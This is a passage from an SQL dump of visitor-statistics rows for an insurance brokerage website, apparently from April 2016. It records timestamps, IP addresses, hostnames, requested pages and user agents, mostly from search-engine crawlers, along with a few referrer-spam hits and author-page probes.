+http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(21852,'0b_52764f00305e96026d3ad2d2d815c8ae','1461771047','192.3.152.107','host.colocrossing.com','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(21855,'0b_a8308bdc57ca3d9bb5531fbdc32f68ed','1461773490','157.55.39.107','msnbot-157-55-39-107.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(21857,'0b_453a7e07fb81b30111be015d2a8f439f','1461774158','100.43.81.130','spider-100-43-81-130.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(21860,'0b_98974f925c4f060b9f524dc066af421c','1461774162','100.43.85.17','spider-100-43-85-17.yandex.com','/case-status/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(21861,'0b_161f8a26c139ad0002445e4a9c870f51','1461776019','157.55.39.22','msnbot-157-55-39-22.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21864,'0b_0095604dda9b84b34a94fe42872ff91c','1461776023','199.30.24.191','msnbot-199-30-24-191.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b','http://www.empireins.com/','',0,'Win7','BingPreview 1','','','','BingBot','','','','0','0',0),(21866,'0b_539867ced256806e40c00b36d6c0f9cd','1461776380','157.55.39.226','msnbot-157-55-39-226.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21869,'0b_6c6752f84038b756afeed5fdc669915c','1461780810','157.55.39.226','msnbot-157-55-39-226.search.msn.com','/agent-tools/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(21872,'0b_50f59da4808c748b5294238a33539c0b','1461780861','178.137.90.202','178-137-90-202-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; MRA 4.6 (build 01425); .NET CLR 1.1.4322; .NET CLR 2.0.50727)','http://inzn.ru/','',0,'WinXP','IE 6','','','','','','','','0','0',0),(21873,'0b_6c6752f84038b756afeed5fdc669915c','1461781064','157.55.39.226','msnbot-157-55-39-226.search.msn.com','/?page_id=169','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(21876,'0b_6c6752f84038b756afeed5fdc669915c','1461781066','157.55.39.226','msnbot-157-55-39-226.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(21878,'0b_6c6752f84038b756afeed5fdc669915c','1461781257','157.55.39.226','msnbot-157-55-39-226.search.msn.com','/under.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21879,'0b_323015343069eacd9277f8c0faaad459','1461781753','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(21882,'0b_323015343069eacd9277f8c0faaad459','1461781755','68.180.230.123','b115363.yse.yahoo.net','/igo/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(21884,'0b_68de24666e77dfe20f020bad0210ab79','1461782398','5.9.73.227','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','3','0',0),(21885,'0b_68de24666e77dfe20f020bad0210ab79','1461782400','5.9.73.227','majestic12.co.uk','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','3','0',0),(21887,'0b_68de24666e77dfe20f020bad0210ab79','1461782403','5.9.73.227','majestic12.co.uk','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','3','0',0),(21888,'0b_68de24666e77dfe20f020bad0210ab79','1461782406','5.9.73.227','majestic12.co.uk','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','3','0',0),(21891,'0b_75c0685c52245a333effe0a0fbd3f018','1461783208','151.138.13.244','151.138.13.244','/','SuperPagesUrlVerifyBot/1.0','','',0,'','','','','','SuperPagesUrlVerifyBot','','','','0','0',0),(21893,'0b_a5b5fde246aeaff398529eb2f9e72bfe','1461784818','180.76.15.152','baiduspider-180-76-15-152.crawl.baidu.com','/licensing-contracting/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(21894,'0b_7aa168a1dcc4004d9384d6c9cddfbfea','1461785184','176.31.39.23','176.31.39.23','/contact/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(21896,'0b_db66a9e6b1efcfa909b365ba06d0b6b8','1461787431','66.249.64.29','crawl-66-249-64-29.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(21899,'0b_237be7703a86851c37aca3d8cd93c3a5','1461788436','64.237.54.5','64.237.54.5.choopa.net','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(21902,'0b_334a2b21f5fa615579e76921af2acbf3','1461788437','192.3.145.134','host.colocrossing.com','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(21905,'0b_8b4ec7e68b005ba5450e129bb096853d','1461788437','198.211.25.101','101-25-211-198-dedicated.multacom.com','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(21906,'0b_b2fe2cbbde289c66c1288aa93f869f6f','1461788834','180.76.15.153','baiduspider-180-76-15-153.crawl.baidu.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(21909,'0b_920383e30829e7a70f7d7768e1d0d7b4','1461789633','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(21912,'0b_22e9e79c016393a518b319d85205253f','1461789637','141.8.143.235','spider-141-8-143-235.yandex.com','/agent-tools/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(21914,'0b_a6b4432a01fc6291daa6db5a78c3fcb8','1461790682','72.181.204.134','cpe-72-181-204-134.tx.res.rr.com','/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win10','','us','','','','','','','0','0',0),(21917,'0b_a6b4432a01fc6291daa6db5a78c3fcb8','1461790683','72.181.204.134','cpe-72-181-204-134.tx.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win10','','us','','','','','','','0','0',0),(21920,'0b_52c980df458ca5947cacc138526be3e0','1461790850','134.249.55.100','134-249-55-100-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; KTXN)','http://call-of-duty.info/','',0,'Win2000','IE 6','','','','','','','','0','0',0),(21923,'0b_16a6b2ee66e5b4e0af8a16b3ea1e5c84','1461791528','54.183.241.70','ec2-54-183-241-70.us-west-1.compute.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36','','',0,'MacOSX','Chrome 40','','','','','','','','0','0',0),(21926,'0b_f01579d83288c7e6a9c08839f7e4142e','1461791528','162.210.196.129','hosted-by.leaseweb.com','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(21927,'0b_f01579d83288c7e6a9c08839f7e4142e','1461791530','162.210.196.129','hosted-by.leaseweb.com','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(21930,'0b_2b6a79ab8508acaf5b7ddc34e9b163d3','1461791536','52.53.204.22','ec2-52-53-204-22.us-west-1.compute.amazonaws.com','/robots.txt','spiderbot','','',0,'','','','','','Unknown Spider','','','','0','0',0),(21933,'0b_2b6a79ab8508acaf5b7ddc34e9b163d3','1461791537','52.53.204.22','ec2-52-53-204-22.us-west-1.compute.amazonaws.com','/','spiderbot','','',0,'','','','','','Unknown Spider','','','','0','0',0),(21935,'0b_2b6a79ab8508acaf5b7ddc34e9b163d3','1461791541','52.53.204.22','ec2-52-53-204-22.us-west-1.compute.amazonaws.com','/agent-tools/','spiderbot','','',0,'','','','','','Unknown Spider','','','','0','0',0),(21938,'0b_2b6a79ab8508acaf5b7ddc34e9b163d3','1461791542','52.53.204.22','ec2-52-53-204-22.us-west-1.compute.amazonaws.com','/register/','spiderbot','','',0,'','','','','','Unknown Spider','','','','0','0',0),(21941,'0b_2b6a79ab8508acaf5b7ddc34e9b163d3','1461791543','52.53.204.22','ec2-52-53-204-22.us-west-1.compute.amazonaws.com','/about-us/','spiderbot','','',0,'','','','','','Unknown Spider','','','','0','0',0),(21944,'0b_2b6a79ab8508acaf5b7ddc34e9b163d3','1461791545','52.53.204.22','ec2-52-53-204-22.us-west-1.compute.amazonaws.com','/insentives/','spiderbot','','',0,'','','','','','Unknown Spider','','','','0','0',0),(21945,'0b_2b6a79ab8508acaf5b7ddc34e9b163d3','1461791546','52.53.204.22','ec2-52-53-204-22.us-west-1.compute.amazonaws.com','/licensing-contracting/','spiderbot','','',0,'','','','','','Unknown Spider','','','','0','0',0),(21947,'0b_2b6a79ab8508acaf5b7ddc34e9b163d3','1461791547','52.53.204.22','ec2-52-53-204-22.us-west-1.compute.amazonaws.com','/carriers/','spiderbot','','',0,'','','','','','Unknown Spider','','','','0','0',0),(21950,'0b_2b6a79ab8508acaf5b7ddc34e9b163d3','1461791549','52.53.204.22','ec2-52-53-204-22.us-west-1.compute.amazonaws.com','/contact/','spiderbot','','',0,'','','','','','Unknown Spider','','','','0','0',0),(21951,'0b_2b6a79ab8508acaf5b7ddc34e9b163d3','1461791552','52.53.204.22','ec2-52-53-204-22.us-west-1.compute.amazonaws.com','/case-status/','spiderbot','','',0,'','','','','','Unknown Spider','','','','0','0',0),(21953,'0b_2b6a79ab8508acaf5b7ddc34e9b163d3','1461791554','52.53.204.22','ec2-52-53-204-22.us-west-1.compute.amazonaws.com','/forms/','spiderbot','','',0,'','','','','','Unknown Spider','','','','0','0',0),(21954,'0b_4313f0c4593c0c51f3deb8a99b77dc83','1461791753','178.63.13.15','static.15.13.63.178.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(21957,'0b_4313f0c4593c0c51f3deb8a99b77dc83','1461791758','178.63.13.15','static.15.13.63.178.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(21959,'0b_b83c200398ee8aa46ba6ebd7e52dc011','1461792312','40.77.167.89','msnbot-40-77-167-89.search.msn.com','/under.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21960,'0b_b83c200398ee8aa46ba6ebd7e52dc011','1461792313','40.77.167.89','msnbot-40-77-167-89.search.msn.com','/calc.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21963,'0b_24de187789fea9eb26fed6f68a1b4423','1461792806','72.181.204.134','cpe-72-181-204-134.tx.res.rr.com','/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win10','','us','1366 x 768','','','','','','0','0',0),(21965,'0b_2dcdc16398d12de40ac7fa9ace7345e8','1461793535','178.137.90.202','178-137-90-202-lvv.broadband.kyivstar.net','/','Opera/9.01 (Windows NT 5.1; U; en)','http://accessories.afora.ru/','',0,'WinXP','Opera 9','us','','','','','','','0','0',0),(21968,'0b_a7d4114900812e3f5dea9d50367c2fa8','1461798555','207.46.13.109','msnbot-207-46-13-109.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21971,'0b_a7d4114900812e3f5dea9d50367c2fa8','1461798590','207.46.13.109','msnbot-207-46-13-109.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21972,'0b_a4c4d7beac9c2d6f13cf1dc4cd4f343b','1461801857','188.214.55.232','188.214.55.232','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.3.4000 Chrome/30.0.1599.101 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 30','us','','','','','','','0','0',0),(21974,'0b_769b1972d72d1fe69f252064c64ddf5b','1461802036','178.255.215.70','crawl06.exabot.com','/robots.txt','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(21975,'0b_769b1972d72d1fe69f252064c64ddf5b','1461802036','178.255.215.70','crawl06.exabot.com','/resources.htm','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(21977,'0b_769b1972d72d1fe69f252064c64ddf5b','1461802041','178.255.215.70','crawl06.exabot.com','/resources.htm','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(21978,'0b_ba9539fc505df8a52612c920d754949d','1461803121','180.76.15.11','baiduspider-180-76-15-11.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(21980,'0b_3718202d482a51cd680e066bd3cedfea','1461804069','68.174.176.184','cpe-68-174-176-184.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win10','Chrome 48','cn','1366 x 768','Google','','','','','0','0',0),(21983,'0b_3718202d482a51cd680e066bd3cedfea','1461804071','68.174.176.184','cpe-68-174-176-184.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 48','cn','1366 x 768','','','','','','0','0',0),(21986,'0b_3718202d482a51cd680e066bd3cedfea','1461804088','68.174.176.184','cpe-68-174-176-184.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win10','Chrome 48','cn','1366 x 768','Google','','','','','0','0',0),(21987,'0b_3718202d482a51cd680e066bd3cedfea','1461804089','68.174.176.184','cpe-68-174-176-184.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 48','cn','1366 x 768','','','','','','0','0',0),(21990,'0b_3718202d482a51cd680e066bd3cedfea','1461804095','68.174.176.184','cpe-68-174-176-184.nyc.res.rr.com','/about-us/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 48','cn','1366 x 768','','','','','','0','51',0),(21993,'0b_3718202d482a51cd680e066bd3cedfea','1461804118','68.174.176.184','cpe-68-174-176-184.nyc.res.rr.com','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win10','Chrome 48','cn','1366 x 768','','','','','','0','51',0),(21996,'0b_3718202d482a51cd680e066bd3cedfea','1461804136','68.174.176.184','cpe-68-174-176-184.nyc.res.rr.com','/insentives/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/meet-the-eib-team/','',0,'Win10','Chrome 48','cn','1366 x 768','','','','','','0','51',0),(21998,'0b_3718202d482a51cd680e066bd3cedfea','1461804138','68.174.176.184','cpe-68-174-176-184.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/insentives/','',0,'Win10','Chrome 48','cn','1366 x 768','','','','','','0','51',0),(22001,'0b_3718202d482a51cd680e066bd3cedfea','1461804139','68.174.176.184','cpe-68-174-176-184.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 48','cn','1366 x 768','','','','','','0','0',0),(22004,'0b_e8715dd4d5cd18509a65374712337afc','1461805791','207.46.13.109','msnbot-207-46-13-109.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22005,'0b_8ffed18ab29c17d185f7906d611a1172','1461806318','130.185.155.74','130.185.155.74','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(22008,'0b_8ffed18ab29c17d185f7906d611a1172','1461806328','130.185.155.74','130.185.155.74','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(22010,'0b_8ffed18ab29c17d185f7906d611a1172','1461806338','130.185.155.74','130.185.155.74','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(22011,'0b_e8715dd4d5cd18509a65374712337afc','1461806507','207.46.13.109','msnbot-207-46-13-109.search.msn.com','/contact/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(22014,'0b_f5672862c591d42b7e3eeee9c85b5c8c','1461810734','157.55.39.249','msnbot-157-55-39-249.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(22017,'0b_f881d930474bbe3594be9600fdc9e6a4','1461813452','207.46.13.109','msnbot-207-46-13-109.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22020,'0b_827f948862f91df7208cca699b52b735','1461817740','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(22022,'0b_80b10a4ebf9a994146032e3d466e93f9','1461819292','24.102.99.156','cpe-24-102-99-156.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win10','Chrome 49','us','1600 x 900','Google','','','','','0','0',0),(22025,'0b_80b10a4ebf9a994146032e3d466e93f9','1461819294','24.102.99.156','cpe-24-102-99-156.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1600 x 900','','','','','','0','0',0),(22028,'0b_80b10a4ebf9a994146032e3d466e93f9','1461819319','24.102.99.156','cpe-24-102-99-156.nyc.res.rr.com','/about-us/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1600 x 900','','','','','','0','0',0),(22031,'0b_80b10a4ebf9a994146032e3d466e93f9','1461819319','24.102.99.156','cpe-24-102-99-156.nyc.res.rr.com','/about-us/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1600 x 900','','','','','','0','0',0),(22032,'0b_80b10a4ebf9a994146032e3d466e93f9','1461819368','24.102.99.156','cpe-24-102-99-156.nyc.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win10','Chrome 49','us','1600 x 900','','','','','','0','51',0),(22034,'0b_80b10a4ebf9a994146032e3d466e93f9','1461819377','24.102.99.156','cpe-24-102-99-156.nyc.res.rr.com','/carriers/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win10','Chrome 49','us','1600 x 900','','','','','','0','51',0),(22035,'0b_80b10a4ebf9a994146032e3d466e93f9','1461819514','24.102.99.156','cpe-24-102-99-156.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win10','Chrome 49','us','1600 x 900','Google','','','','','0','51',0),(22038,'0b_80b10a4ebf9a994146032e3d466e93f9','1461819516','24.102.99.156','cpe-24-102-99-156.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1600 x 900','','','','','','0','0',0),(22041,'0b_80b10a4ebf9a994146032e3d466e93f9','1461819585','24.102.99.156','cpe-24-102-99-156.nyc.res.rr.com','/licensing-contracting/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1600 x 900','','','','','','0','51',0),(22044,'0b_80b10a4ebf9a994146032e3d466e93f9','1461819883','24.102.99.156','cpe-24-102-99-156.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win10','Chrome 49','us','1600 x 900','Google','','','','','0','51',0),(22047,'0b_80b10a4ebf9a994146032e3d466e93f9','1461819884','24.102.99.156','cpe-24-102-99-156.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1600 x 900','','','','','','0','0',0),(22049,'0b_80b10a4ebf9a994146032e3d466e93f9','1461819899','24.102.99.156','cpe-24-102-99-156.nyc.res.rr.com','/contact/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1600 x 900','','','','','','0','51',0),(22052,'0b_57ce3e25983b18115da3ad4b40dce3bb','1461820124','174.34.135.242','174.34.135.242.rdns.ubiquity.io','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(22055,'0b_57ce3e25983b18115da3ad4b40dce3bb','1461820126','174.34.135.242','174.34.135.242.rdns.ubiquity.io','/paramed.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(22056,'0b_57ce3e25983b18115da3ad4b40dce3bb','1461820135','174.34.135.242','174.34.135.242.rdns.ubiquity.io','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(22059,'0b_57ce3e25983b18115da3ad4b40dce3bb','1461820137','174.34.135.242','174.34.135.242.rdns.ubiquity.io','/paramed.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(22062,'0b_57ce3e25983b18115da3ad4b40dce3bb','1461820139','174.34.135.242','174.34.135.242.rdns.ubiquity.io','/quotes.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(22064,'0b_57ce3e25983b18115da3ad4b40dce3bb','1461820142','174.34.135.242','174.34.135.242.rdns.ubiquity.io','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(22065,'0b_6e7b443065b1e71dfde951cf96c37410','1461826655','54.144.187.111','ec2-54-144-187-111.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB6 (.NET CLR 3.5.30729)','','',0,'WinVista','Firefox 3','us','','','','','','','0','0',0),(22068,'0b_d5ca2b59b17f52e9f8924cb8096f9923','1461827512','66.249.64.94','crawl-66-249-64-94.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(22070,'0b_d5ca2b59b17f52e9f8924cb8096f9923','1461827522','66.249.64.89','crawl-66-249-64-89.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; 